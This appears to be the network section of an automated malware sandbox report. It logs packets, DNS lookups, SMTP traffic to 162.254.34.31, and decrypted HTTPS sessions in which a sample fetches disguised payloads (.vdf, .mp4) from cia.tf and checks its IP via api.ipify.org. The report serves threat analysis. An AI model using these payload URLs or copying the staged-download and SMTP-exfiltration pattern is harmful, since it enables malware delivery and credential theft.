Nov 25, 2024 14:47:54.068857908 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.071464062 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.071486950 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.071537018 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.071542978 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.071572065 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.076869011 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.076900959 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.076966047 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.076966047 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.076986074 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.084436893 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.084456921 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.084516048 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.084523916 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.084536076 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.091937065 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.091964006 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.092004061 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.092010021 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.092032909 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.099076986 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.099097967 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.099140882 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.099145889 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.099173069 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.106544971 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.106569052 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.106617928 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.106625080 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.106650114 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.113168001 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.113197088 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.113234043 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.113239050 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.113266945 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.156853914 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.208403111 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.264121056 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.264153957 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.264357090 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.264374018 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.264749050 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.271358967 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.271408081 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.271435022 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.271437883 CET	443	49747	172.67.129.178	192.168.2.4
Nov 25, 2024 14:47:54.271485090 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.271501064 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:47:54.276397943 CET	49747	443	192.168.2.4	172.67.129.178
Nov 25, 2024 14:48:06.475922108 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:06.475958109 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:06.476023912 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:06.479871035 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:06.479887962 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:07.691350937 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:07.691450119 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:07.693490982 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:07.693500042 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:07.694586992 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:07.743141890 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:07.805706024 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:07.851340055 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:08.548203945 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:08.548290014 CET	443	49750	104.26.13.205	192.168.2.4
Nov 25, 2024 14:48:08.548414946 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:08.552937984 CET	49750	443	192.168.2.4	104.26.13.205
Nov 25, 2024 14:48:09.233197927 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:09.353200912 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:09.353291988 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:10.597456932 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:10.600487947 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:10.720664978 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:10.998661041 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:11.000181913 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:11.120198965 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:11.399952888 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:11.400214911 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:11.520145893 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:11.803062916 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:11.803329945 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:11.923360109 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:12.202763081 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:12.205069065 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:12.325036049 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:12.605240107 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:12.605396986 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:12.726057053 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.003722906 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.004415035 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:13.004462004 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:13.004504919 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:13.004515886 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:48:13.124411106 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.124470949 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.124520063 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.124548912 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.561058044 CET	587	49757	162.254.34.31	192.168.2.4
Nov 25, 2024 14:48:13.610045910 CET	49757	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:49:22.141817093 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:49:22.261790037 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:49:22.543203115 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:49:22.543359041 CET	587	49743	162.254.34.31	192.168.2.4
Nov 25, 2024 14:49:22.543412924 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:49:22.543441057 CET	49743	587	192.168.2.4	162.254.34.31
Nov 25, 2024 14:49:22.663425922 CET	587	49743	162.254.34.31	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 14:47:21.747036934 CET	53628	53	192.168.2.4	1.1.1.1
Nov 25, 2024 14:47:22.157695055 CET	53	53628	1.1.1.1	192.168.2.4
Nov 25, 2024 14:47:39.324376106 CET	59080	53	192.168.2.4	1.1.1.1
Nov 25, 2024 14:47:39.462318897 CET	53	59080	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 14:47:21.747036934 CET	192.168.2.4	1.1.1.1	0x2be5	Standard query (0)	cia.tf	A (IP address)	IN (0x0001)	false
Nov 25, 2024 14:47:39.324376106 CET	192.168.2.4	1.1.1.1	0x7433	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 14:47:22.157695055 CET	1.1.1.1	192.168.2.4	0x2be5	No error (0)	cia.tf	172.67.129.178	A (IP address)	IN (0x0001)	false
Nov 25, 2024 14:47:22.157695055 CET	1.1.1.1	192.168.2.4	0x2be5	No error (0)	cia.tf	104.21.1.182	A (IP address)	IN (0x0001)	false
Nov 25, 2024 14:47:39.462318897 CET	1.1.1.1	192.168.2.4	0x7433	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 25, 2024 14:47:39.462318897 CET	1.1.1.1	192.168.2.4	0x7433	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 25, 2024 14:47:39.462318897 CET	1.1.1.1	192.168.2.4	0x7433	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cia.tf

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	172.67.129.178	443	7496	C:\Users\user\Desktop\Ref#2056119.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:47:23 UTC	92	OUT	GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1 Host: cia.tf Connection: Keep-Alive
2024-11-25 13:47:24 UTC	960	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 13:47:24 GMT Content-Type: application/octet-stream Content-Length: 1127432 Connection: close accept-ranges: bytes Cache-Control: public, max-age=0 content-disposition: attachment; filename="Dhykdmlsc.vdf" etag: W/"113408-19362e45d6a" last-modified: Mon, 25 Nov 2024 10:35:53 GMT x-powered-by: Express cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFScQUv8YaKrlD96oqijjnNMIckk0QKMfcVU2b1HP%2BRSNvgWYbbkqCWIlob8DoZLkUBGZuGot6EWinw0rJT8ULRtt06GlpF0Hl7yyo9lCfMAbkDZD9epJ%2BU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8217234d985e68-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2809&recv_bytes=706&delivery_rate=1731909&cwnd=250&unsent_bytes=0&cid=a35bbbf7927d26d6&ts=1099&x=0"
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: 17 10 9e 68 50 d7 40 e0 46 27 2a 8b 31 0f 2b 36 e9 67 6e 9c 96 60 58 78 bc 6b c3 1d 44 35 20 17 9b 57 f4 42 c1 51 55 05 da 44 cb fc 7a 35 71 c1 7c 03 f9 de 00 c6 1a 63 12 8a 68 e9 38 e3 99 36 dd bd 53 7f 7d 53 30 27 26 0a ce 1b c2 65 f2 bc 2f 70 98 11 98 20 9e b2 c6 78 a9 4d 79 91 fa 11 26 f4 5f c7 14 4b bc 42 d1 8b 1f e3 9f d5 9c 43 cd 7a f4 fb a3 dc a0 4a f3 39 b4 e2 49 22 37 6f 1c 06 bb 56 e0 f2 43 d9 75 7d c1 cd 8d d7 be 14 91 14 44 9d 32 1e cd bb 92 b9 9d b5 56 00 85 18 5f 77 b3 68 bc 3a 60 72 9f e2 85 67 a1 99 0d 0d af a6 56 89 8c 03 e5 35 a1 60 62 8d 2c 09 e5 27 3f 1c fe 74 c4 9a 15 b4 16 0e 68 d5 67 7f df 9f 6b d9 f9 7f 9f 76 41 ad d5 55 d0 c2 11 6f f1 36 b2 aa 8c 1b e6 8b df 4f 1a fc 58 68 d1 10 67 5a 31 97 22 bd 50 4f 9c 0f e6 77 e8 56 8b 23 d0 Data Ascii: hP@F'*1+6gn`XxkD5 WBQUDz5q\|ch86S}S0'&e/p xMy&_KBCzJ9I"7oVCu}D2V_wh:`rgV5`b,'?thgkvAUo6OXhgZ1"POwV#
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: 93 01 45 3f 3a df 5a 1e 21 58 f9 99 06 fa 20 2c 8a ea 47 3d 19 42 04 e9 0f 34 4b e2 28 b7 ef a0 e8 2b 1a 95 a6 88 d1 30 cd 63 9e 64 19 b9 dd 83 ef 28 cd 03 1d 06 e7 85 9d 10 12 b8 5f 33 24 64 87 cc c7 f7 5a 9c 26 df 23 c6 01 ae 55 a2 5e 37 12 f7 f8 7f 6b 81 62 43 eb 51 76 9e cf e1 5e dd b9 31 03 55 0c 09 9b 14 ab 20 d8 75 61 00 7a 18 d1 5a 28 f0 4d 2e ad c3 d7 7f 75 65 00 fd b0 9d ff 50 ad a0 8e 9a 24 39 b6 f5 21 ea cb 79 80 39 84 aa 38 8f 96 c9 24 eb f3 5b d0 5d 74 f3 f2 9e 3d 7a 85 80 f5 02 4b 10 9f 18 ef 62 11 fd b7 16 77 83 cc a9 6f cf e5 ef be 2c f7 1d 3e ef 06 d1 2b 06 b4 17 68 c1 36 a9 1e bc ff 6c 12 94 53 5e d0 31 0b 7a 05 61 58 de 62 5d 53 1c 8b a5 72 24 d2 a8 1e ff a6 06 15 01 2d cb 03 73 bd 82 aa 9a c3 5e d1 4a 8b 3c f3 10 b2 1d 1e 7f 61 f7 fb Data Ascii: E?:Z!X ,G=B4K(+0cd(_3$dZ&#U^7kbCQv^1U uazZ(M.ueP$9!y98$[]t=zKbwo,>+h6lS^1zaXb]Sr$-s^J<a
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: 3b ea a1 9e 0d 6f 07 d7 99 ea ec 37 7f 8f b6 4c eb a1 f1 74 53 c7 23 66 dc 44 8e b8 6f 56 bc c3 14 be c7 40 6e b2 83 f0 ce 11 27 3f fa 2e c5 22 ab cd e9 a8 97 50 5c 71 19 e0 57 e5 24 36 6e 1f a6 98 3c 4c 24 4a f3 7f 96 b0 64 93 b1 77 4b d8 de 53 00 33 93 16 a5 5d 71 28 f6 e9 21 76 c9 ac 0a 01 67 18 b1 8f c8 56 79 0d 4e 9c 03 36 bc 84 fe 2e 73 0e a6 9d bc 36 f3 9d 02 7a 3e 04 77 b8 85 3b 09 96 05 ee 17 ff 2b be 55 e4 ff 8e aa 43 e2 41 db 06 b7 3f c8 7f 74 70 92 b6 35 e2 1c e2 77 9c e9 0a ed 69 7e 13 47 9b f9 f4 d2 56 ca 29 9f 51 eb 5d 16 94 3b 5c c0 71 8e 3a bc e3 7c cf 08 95 62 56 5e 16 19 4c 84 b0 b4 d6 45 39 f4 ff 05 a1 c1 5e d7 10 0d b0 bf 46 80 b5 d3 40 e7 50 55 39 16 e8 75 f2 a2 19 9b c8 04 a3 e0 02 91 a6 da 3f ee fd 95 7f 19 d4 d6 e1 bb 2e 17 f7 5b Data Ascii: ;o7LtS#fDoV@n'?."P\qW$6n<L$JdwKS3]q(!vgVyN6.s6z>w;+UCA?tp5wi~GV)Q];\q:\|bV^LE9^F@PU9u?.[
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: fc b4 07 d6 a4 55 88 ca 83 c3 38 8b 69 35 ab cf d4 bf 81 29 19 b4 e3 d2 6a ef a8 1e 81 01 a1 65 81 99 40 3e 46 bd 47 6e f9 5d 5a cd df df 7e d8 ce b3 c5 81 11 26 fb 55 24 71 8d fe 85 d9 49 d0 42 a4 7b 0f e8 d4 51 fb 3b fe 79 05 c7 ac 77 25 70 f5 13 4e b9 22 46 5a 76 ee 08 85 8f 11 44 2c 03 fb 50 38 b3 f5 1c a4 7f 40 f0 76 2b fe db 84 42 1b 23 62 61 c3 8e 70 23 fe 78 c2 2c 16 4a 3b a5 c1 d8 1e b8 3b 49 23 04 1a f3 b2 62 76 27 ca 45 49 c1 e3 82 4b a0 ad ee 5d 2b 91 31 25 e6 e4 0b 3a ab a0 ed be 13 aa 41 8e ca 60 31 12 b1 98 41 83 c6 f4 a3 d5 94 58 6a fc 3a 7c 79 b6 c3 00 0d c0 65 c7 fe ff ca 63 89 9f d1 75 65 72 e9 67 c7 fd f3 c8 60 eb e3 1f cc 87 d4 a6 83 b8 f3 1a 64 e8 69 d6 7a ea 4b 55 07 21 dc bf 39 f0 8e f1 20 f3 02 4c 37 ee d7 34 af 26 0c e2 ff 94 2c Data Ascii: U8i5)je@>FGn]Z~&U$qIB{Q;yw%pN"FZvD,P8@v+B#bap#x,J;;I#bv'EIK]+1%:A`1AXj:\|yecuerg`dizKU!9 L74&,
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: 50 a2 d6 dd 52 51 fc 85 4d 28 dd 8e 83 aa fa 6f e4 ff 39 34 c5 bc d2 a4 04 4c 2c 91 c1 ca 30 8e ba db 8a f1 08 fb 4c ee 41 43 8c bb e7 72 ed 56 fc 14 1f bd 65 cd 8b b5 a5 2e b3 ef c3 7c fe 2f e2 b6 39 53 94 60 d4 93 9f cf 9e bc 82 b2 19 f3 1e f8 34 1f fd 35 f5 57 d6 0c ad 02 5b 85 f0 20 1c ff 73 93 33 5f 2f 34 96 2e af e1 83 9b 44 54 aa 29 c0 c5 ca 4a 7e 99 36 dc 3b d4 17 ed 0a 58 f0 1b 37 d4 6f 66 0a 9c 62 75 85 3b 89 aa a2 2f 2f ca de 0b 49 30 8b 09 53 c8 10 84 75 3f 88 fc 0e e7 43 8a 28 cd c3 87 15 86 cf ab ed b2 31 5f 9c 36 ef cc 7a 7d 6b 52 70 d6 1d 99 95 bd b5 68 f8 47 dc 9a 53 0e dc 9e bd c9 a2 25 98 fd 70 db 33 ed 10 3c 4d 18 03 6b 95 68 22 ea 13 85 a3 1a 90 a1 f9 16 02 a2 0d 34 a9 1b 66 9f 08 56 55 25 21 d5 34 d1 01 58 58 cc 72 44 fb 87 74 79 7d Data Ascii: PRQM(o94L,0LACrVe.\|/9S`45W[ s3_/4.DT)J~6;X7ofbu;//I0Su?C(1_6z}kRphGS%p3<Mkh"4fVU%!4XXrDty}
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: b4 dc b8 7d 74 d3 b9 6e 05 4c 21 bc b5 33 09 cf 39 5e bd 8a 4a 8c 5b c6 a8 32 e8 2e 07 6a ae 0a 7f 77 a9 8e f0 c3 bb 3c 02 ae 50 e7 5b 4c 62 a2 1d ac 38 d7 66 df ae 9d 7e 9b 7d 15 24 d1 e5 96 23 e7 65 45 d2 44 09 a3 8f 81 cd 52 5e 4b 45 7f 54 f9 55 f5 b6 bd a4 4a 09 f4 57 77 2f 03 e6 32 58 33 b0 f8 02 0a 60 28 ee 5a a2 39 dd 60 30 91 58 59 48 a2 d5 0b ca cf d4 11 99 e1 e6 69 f1 f2 d2 7a c1 08 97 e6 c6 a0 b1 74 a8 3f c8 17 3c 36 7b a7 b7 8f 40 f5 6e ec c0 b1 3e 4f eb 3d ad d9 3e 10 dd a6 d9 55 ff 9f f9 dd 21 f7 4e 59 16 d8 91 2f ff fc 83 c7 be 60 e4 35 23 89 96 30 9c 4a d2 ac 08 d0 50 6c a3 d2 7c 3e 2d f5 9e 7a e4 3d 09 3a e1 dd 0b 53 20 e1 6b af eb 0e d9 c5 3f 0b 47 cf 15 62 b7 d0 94 2a 8f 6b 04 11 f5 c6 3a af ea 22 17 3f 75 ec 20 5d 30 e3 b5 17 be 07 76 Data Ascii: }tnL!39^J[2.jw<P[Lb8f~}$#eEDR^KETUJWw/2X3`(Z9`0XYHizt?<6{@n>O=>U!NY/`5#0JPl\|>-z=:S k?Gb*k:"?u ]0v
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: aa 0e 83 ee 9a 85 da 24 3d e5 91 f1 19 e2 27 78 52 b3 5c 8b b2 13 5b 65 a8 c8 64 b2 c5 33 78 fa 9a d9 b2 02 ff 56 74 3a 49 b3 09 1d 01 01 22 ae 8c 60 68 f8 26 8e 6b 51 8d 23 90 ff 37 19 3b 3d 79 2a 64 63 06 4e a4 b8 83 57 73 9a d7 68 05 e2 82 68 e8 01 e8 08 aa 2d 53 80 51 b0 14 e3 4b ac 61 a2 10 11 50 00 43 1d 8b 5f 9b 55 55 26 3d ca 55 24 23 ca 13 2e b0 45 44 38 c1 b9 7a 4e 59 db af 71 60 46 c0 e3 bc 3f 25 28 32 d1 3e ad ad de f4 20 00 9f ed 0c 9e 7a aa 79 43 b6 d2 e0 56 83 8f 2f f0 b2 d1 a1 b7 6c 4c 9c 14 75 d7 c2 8d 7e 3a 67 c4 a4 37 cc 76 ba 1e 08 86 c3 d9 a8 a5 3c 1c aa 94 a5 4a 16 05 b8 3a 78 e4 31 79 64 37 f1 1f d3 a8 32 46 7c 88 b1 86 fe 9e 88 a6 45 4b 51 03 d7 c6 65 54 dc de 22 21 1a de b7 26 b9 1c 8f 08 42 05 af 38 6d 95 4a 50 b8 a1 44 10 d5 36 Data Ascii: $='xR\[ed3xVt:I"`h&kQ#7;=y*dcNWshh-SQKaPC_UU&=U$#.ED8zNYq`F?%(2> zyCV/lLu~:g7v<J:x1yd72F\|EKQeT"!&B8mJPD6
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: 16 0b 1d 99 4a 48 e9 5d 9d 55 23 3a 03 e9 95 12 64 42 30 6c 29 10 42 d5 db ff 8d ef 69 e2 37 6a 39 44 1d 37 d8 9e 4e bd e7 58 b2 f8 0a a6 de e8 14 6a f0 a5 6f 86 44 6f 0a c4 1e b2 28 b7 a5 8c d6 f8 53 62 14 72 25 54 ac 70 b4 10 28 91 fc bb 46 f3 d2 c4 3c a2 fd a5 c5 60 aa 64 93 de 58 03 ed 15 5a 50 f8 4b a9 63 8f 6b 86 73 ac 56 7e 3c f8 2b e5 8e 03 2d 2e 4c 07 ac b1 09 c4 28 d5 de b3 62 03 4a 19 d1 10 ee 2a c7 62 f7 df 5d 97 36 0d d1 a9 a1 d2 d8 94 75 ce 6f 6f 68 90 77 a3 83 2c 24 a9 65 2e 33 df 87 50 39 10 79 20 15 8b 81 ef 45 9e ca 63 1b 7a 68 07 a7 c6 fc 59 f8 21 7f 6e 2a 77 eb d1 a5 e3 8a cc ef 5b 69 68 75 ad ea e3 96 9b 14 0f 36 d2 2b 60 00 84 60 ae b5 39 da 23 cc 4a 90 2a c2 78 ca ba 56 80 ae 57 12 cc c3 13 72 96 12 ec 27 e3 f1 45 73 58 e7 e3 26 68 Data Ascii: JH]U#:dB0l)Bi7j9D7NXjoDo(Sbr%Tp(F<`dXZPKcksV~<+-.L(bJb]6uoohw,$e.3P9y EczhY!nw[ihu6+``9#J*xVWr'EsX&h
2024-11-25 13:47:24 UTC	1369	IN	Data Raw: 57 e7 4f 69 94 c2 ee 08 1c cf fd 75 50 da 0e 0d d4 02 62 05 8c e8 4e bc 1d e7 99 76 b4 ba cf 2c 87 9c bc 25 09 f3 1c ec 1d 0f 6f 73 49 b2 86 64 3f 6a 56 e2 24 da e9 0d 2e 84 c7 f9 ba 91 71 87 ae 55 86 6d 0b e1 40 32 56 04 18 5b 33 13 ad f8 1b 87 28 e7 02 16 d9 70 10 0f d8 f9 8f 93 b6 6f 26 4e f1 bf 5a bd 99 33 13 7d b7 8e 7d 7e 75 d6 ac 1a 9f 4a f7 97 30 01 f3 1e d3 16 53 e6 bb 6e 49 30 b3 5c d2 54 02 16 32 13 69 42 fc 0b 57 8e 6c e8 d0 01 6f 28 a5 5f bf 31 11 53 cc 8d a5 ac 01 a9 c8 45 e4 26 9f cb 6e 01 4b 53 c5 24 e8 35 c7 f0 ec 08 6a 4f 74 cb c0 45 54 a8 9d d8 72 79 02 7a a7 27 63 5c 48 12 37 a0 81 c5 11 87 6d 04 5f 3b 8c 61 2f 4d a6 bf 69 8a c5 8d dc 1a 3b 22 86 ae af 61 41 0c a4 8c 0e 1d 55 e1 84 2c 17 a1 4c d1 a7 ee 22 5b fa 2b 69 06 c4 76 26 b1 a9 Data Ascii: WOiuPbNv,%osId?jV$.qUm@2V[3(po&NZ3}}~uJ0SnI0\T2iBWlo(_1SE&nKS$5jOtETryz'c\H7m_;a/Mi;"aAU,L"[+iv&
2024-11-25 13:47:24 UTC	731	IN	Data Raw: 3b 90 16 08 a3 a0 6b 37 a2 c2 52 43 5b 4a 81 ad 36 48 6f d2 1a 4f ed 8d 04 d6 29 fe 5f fd 6c 1d 2d aa 92 2d 49 7b c8 0e 86 93 e0 55 3e 67 7c 7c e0 b5 96 57 da f0 5d d4 98 84 91 71 69 e3 7d 8b a7 af cc 27 0b e5 a9 a1 2d 82 57 ee a3 87 b6 d8 fb 28 e2 b7 f5 0d e4 e0 23 86 a2 ff a6 8f f7 73 6d 85 e4 f7 3e 18 a7 f7 bb 7c bb 2f d1 e2 ee bf 4c e8 36 d5 49 59 e7 ec 20 c5 3b 93 cb 14 6e 4c ac d5 ee 6d 9b 42 28 4d 06 e4 cc cd 92 15 99 72 4d 58 18 1c 3d 86 c9 04 55 0f e4 15 ba ef d5 c4 e5 20 70 80 1e 46 ff 7b 23 f8 84 37 ee b3 e7 23 17 63 92 33 e6 58 32 04 68 62 0d 3c 96 48 cd 07 1b 00 4f 91 4b 86 09 8b b3 37 4b c9 fb 23 77 92 f2 d3 d6 8a b5 39 14 57 f2 4a 93 79 47 97 03 73 a0 20 44 03 f9 99 88 f3 71 4c e8 b1 ca 53 2d 42 72 41 3e 3d d7 c5 2c 94 4c c8 03 6f ce 8a 49 Data Ascii: ;k7RC[J6HoO)_l--I{U>g\|\|W]qi}'-W(#sm>\|/L6IY ;nLmB(MrMX=U pF{#7#c3X2hb<HOK7K#w9WJyGs DqLS-BrA>=,LoI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	172.67.129.178	443	7852	C:\Users\user\AppData\Local\Temp\Liphmahu.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 13:47:39 UTC	92	OUT	GET /417440cce6502c1c57308172e9826dec.mp4 HTTP/1.1 Host: cia.tf Connection: Keep-Alive
2024-11-25 13:47:40 UTC	961	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 13:47:40 GMT Content-Type: application/octet-stream Content-Length: 958472 Connection: close Cache-Control: public, max-age=14400 content-disposition: attachment; filename="Erscr.mp4" etag: W/"ea008-19362e2e62c" last-modified: Mon, 25 Nov 2024 10:34:17 GMT x-powered-by: Express CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqsovKZAwX7vRayT%2Bs5qStkx5p3ortI8sUkgU4Cmm7UH4W5RvfnBzK0m92tv9MeYOEYXukas0i0F93GqAv0if1YdriLpc54TtM%2FRNutVdJomJYVbiHqgbP8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8217878cf58c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2002&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2808&recv_bytes=706&delivery_rate=1416787&cwnd=213&unsent_bytes=0&cid=eac42314c9c8cb91&ts=781&x=0"
